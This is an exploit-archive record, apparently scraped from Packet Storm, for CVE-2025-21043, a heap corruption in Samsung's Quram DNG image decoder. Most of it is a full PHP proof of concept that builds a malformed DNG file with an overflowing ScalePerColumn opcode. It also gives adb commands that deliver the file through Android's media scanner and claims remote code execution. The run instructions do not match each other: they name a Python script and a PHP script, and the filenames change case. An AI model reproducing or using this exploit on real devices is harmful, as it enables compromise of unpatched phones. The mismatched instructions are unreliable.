{“lastseen”:”2026-02-09T16:23:52″,”description”:”Samsung devices utilize Quram’s DNG decoder. A malformed ScalePerColumn opcode with oversized areaSpec and extreme pitches leads to arithmetic overflow in the per-column scaling loop. After allocation miscalculation, subsequent writes corrupt heap…”,”published”:”2026-02-09T00:00:00″,”modified”:”2026-02-09T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung Quram DNG Heap Corruption”,”source”:””,”references”:””,”id”:”PACKETSTORM:215127″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-21043″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung Quram DNG Heap Corruption via Malformed ScalePerColumn Opcode |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211370\/ \\u0026 CVE-2025-21043\\n \\n [+] Summary : Samsung devices utilize Quram\u2019s DNG decoder. A malformed ScalePerColumn opcode with oversized areaSpec and extreme pitches leads to arithmetic overflow in\\n the per-column scaling loop. After allocation miscalculation, subsequent writes corrupt heap structures. \\n \\t\\t\\t Carefully crafted payloads enable control over free()function pointers, leading to fully controlled execution.\\n \\n [+] Impact\\n \\n Heap metadata \\u0026 function pointer overwrite \u2192 Remote Code Execution.\\n \\n ###############################################################################\\n PoC highlights:\\n – Takes a valid DNG template.\\n – Injects ScalePerColumn opcode ID 42 with malicious parameters.\\n – Forced overwrite due to uncontrolled scale-array computation.\\n – Deliverable via Android media scanner.\\n \\n Save PoC as:\\n exploit.py\\n template.dng\\n \\n Run:\\n python3 exploit.py\\n adb push PoC1.jpeg \/sdcard\/\\n adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE \\\\\\n -d file:\/\/\/sdcard\/PoC1.jpeg\\n \\n ###############################################################################\\n Affected:\\n – Samsung devices using libimagecodec.quram.so\\n – Android versions 13\u201316\\n – Patch levels older than September 2025\\n \\n Impact:\\n – Heap metadata corruption\\n – Function pointer overwrite\\n – Controlled RCE in Quram image decoding pipeline\\n \\n ###############################################################################\\n Technical:\\n The ScalePerColumn opcode (ID 42) accepts an areaSpec followed by a\\n variable-length scaling array. Due to lack of integer sanitization, an extreme\\n left offset combined with huge column pitch results in an incorrect scale_count\\n and massive allocation mismatch. Writes overflow heap chunks, overwriting allocator\\n metadata and indirect function pointers.\\n \\n PoC:\\n – Injects crafted opcode at arbitrary IFD offset.\\n – Builds malicious areaSpec.\\n – Forces memory overwrite during scaling loop.\\n \\n ###############################################################################\\n How To Save:\\n 1) Save files:\\n template.dng\\n exploit.py\\n \\n How To Run:\\n php poc.php\\n adb push PoC1.jpeg \/sdcard\/\\n adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE \\\\\\n -d file:\/\/\/sdcard\/PoC1.jpeg\\n \\n Expected Result:\\n Quram decoder processes malformed opcode \u2192 heap corruption triggered.\\n \\n [+] POC : \\n \\n \\u003c?php\\n \\n \\n function u32($v, $little=true){\\n return pack($little?\\”V\\”:\\”N\\”, $v);\\n }\\n \\n function i32($v, $little=true){\\n return pack($little?\\”V\\”:\\”N\\”, $v);\\n }\\n \\n function f32($f, $little=true){\\n return $little ? pack(\\”g\\”,$f) : pack(\\”G\\”,$f);\\n }\\n \\n function create_minimal_dng(){\\n $d = \\”\\”;\\n $d.= \\”II*\\\\x00\\”; \/\/ TIFF header\\n $d.= u32(8); \/\/ First IFD offset\\n \\n $d.= pack(\\”v\\”,1); \/\/ Num entries\\n $d.= pack(\\”v\\”,254); \/\/ Tag\\n $d.= pack(\\”v\\”,4);\\n $d.= u32(1);\\n $d.= u32(0);\\n $d.= u32(0);\\n return $d;\\n }\\n \\n function find_or_create_opcode_offset(\\u0026$tmpl){\\n $ifd = unpack(\\”V\\”,substr($tmpl,4,4))[1];\\n while($ifd != 0 \\u0026\\u0026 $ifd \\u003c strlen($tmpl)){\\n $n = unpack(\\”v\\”,substr($tmpl,$ifd,2))[1];\\n for($i=0;$i\\u003c$n;$i++){\\n $o = $ifd+2+($i*12);\\n $tag = unpack(\\”v\\”,substr($tmpl,$o,2))[1];\\n if($tag == 0xC74D){\\n $cnt = unpack(\\”V\\”,substr($tmpl,$o+4,4))[1];\\n $off = unpack(\\”V\\”,substr($tmpl,$o+8,4))[1];\\n return [$off,$cnt];\\n }\\n }\\n $ifd = unpack(\\”V\\”,substr($tmpl,$ifd+2+($n*12),4))[1];\\n }\\n \\n $new = strlen($tmpl);\\n $ifd = \\”\\”;\\n $ifd .= pack(\\”v\\”,1);\\n $ifd .= pack(\\”v\\”,0xC74D);\\n $ifd .= pack(\\”v\\”,4);\\n $cntOffset = strlen($ifd);\\n $ifd .= u32(0);\\n $opcodeDataOffset = $new + strlen($ifd) + 4;\\n $ifd .= u32($opcodeDataOffset);\\n $ifd .= u32(0);\\n $tmpl .= $ifd;\\n return [$opcodeDataOffset,0];\\n }\\n \\n function build_malicious($spec){\\n $out = \\”\\”;\\n $out .= u32(42); \/\/ opcode ID ScalePerColumn\\n \\n $areaSpec = 28;\\n $scaleData = 1024;\\n $tot = $areaSpec + 4 + $scaleData;\\n $out .= u32($tot);\\n \\n $out .= i32($spec[‘l’]);\\n $out .= i32($spec[‘t’]);\\n $out .= i32($spec[‘r’]);\\n $out .= i32($spec[‘b’]);\\n $out .= u32($spec[‘fPlane’]);\\n $out .= u32($spec[‘fPlanes’]);\\n $out .= u32($spec[‘row_pitch’]);\\n $out .= u32($spec[‘col_pitch’]);\\n \\n $col = ($spec[‘r’] – $spec[‘l’]) \/ $spec[‘col_pitch’];\\n if($col \\u003c=0) $col = 1;\\n $out .= u32($col);\\n \\n for($i=0;$i\\u003c$col;$i++)\\n $out .= f32(2.0);\\n \\n while(strlen($out) \\u003c $areaSpec+4+$scaleData)\\n $out .= \\”\\\\x00\\”;\\n \\n return $out;\\n }\\n \\n function inject_opcode(\\u0026$tmpl,$offset,$data,$count){\\n if($offset \\u003e= strlen($tmpl)){\\n $tmpl = str_pad($tmpl,$offset,\\”\\\\0\\”);\\n $tmpl .= $data;\\n } else {\\n $tmpl = substr_replace($tmpl,$data,$offset);\\n }\\n \\n $ifd = unpack(\\”V\\”,substr($tmpl,4,4))[1];\\n while($ifd != 0){\\n $n = unpack(\\”v\\”,substr($tmpl,$ifd,2))[1];\\n for($i=0;$i\\u003c$n;$i++){\\n $o = $ifd+2+($i*12);\\n $tag = unpack(\\”v\\”,substr($tmpl,$o,2))[1];\\n if($tag == 0xC74D){\\n $new = u32($count+1);\\n $tmpl = substr_replace($tmpl,$new,$o+4,4);\\n return;\\n }\\n }\\n $ifd = unpack(\\”V\\”,substr($tmpl,$ifd+2+($n*12),4))[1];\\n }\\n }\\n \\n $templ = \\”template.dng\\”;\\n if(!file_exists($templ)){\\n file_put_contents($templ, create_minimal_dng());\\n }\\n $t = file_get_contents($templ);\\n \\n $spec = [\\n ‘l’=\\u003e-2147483644,\\n ‘r’=\\u003e3,\\n ‘t’=\\u003e0,\\n ‘b’=\\u003e236,\\n ‘col_pitch’=\\u003e2147483646,\\n ‘row_pitch’=\\u003e1,\\n ‘fPlane’=\\u003e0,\\n ‘fPlanes’=\\u003e3\\n ];\\n \\n list($off,$cnt) = find_or_create_opcode_offset($t);\\n $data = build_malicious($spec);\\n \\n \/\/ append if existing opcodes\\n $inject = $off;\\n if($cnt \\u003e 0){\\n $p = $off;\\n for($i=0;$i\\u003c$cnt;$i++){\\n $id = unpack(\\”V\\”,substr($t,$p,4))[1];\\n $sz = unpack(\\”V\\”,substr($t,$p+4,4))[1];\\n $p += 8+$sz;\\n }\\n $inject = $p;\\n }\\n \\n inject_opcode($t,$inject,$data,$cnt);\\n \\n file_put_contents(\\”exploit.dng\\”,$t);\\n copy(\\”exploit.dng\\”,\\”Poc1.jpeg\\”);\\n \\n echo \\”[+] Generated exploit.dng and Poc1.jpeg\\\\n\\”;\\n ?\\u003e\\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215127″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215127\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-09T16:23:52″,”description”:”Samsung devices utilize Quram’s DNG decoder. A malformed ScalePerColumn opcode with oversized areaSpec and extreme pitches leads to arithmetic overflow in the per-column scaling loop….<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-39810","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n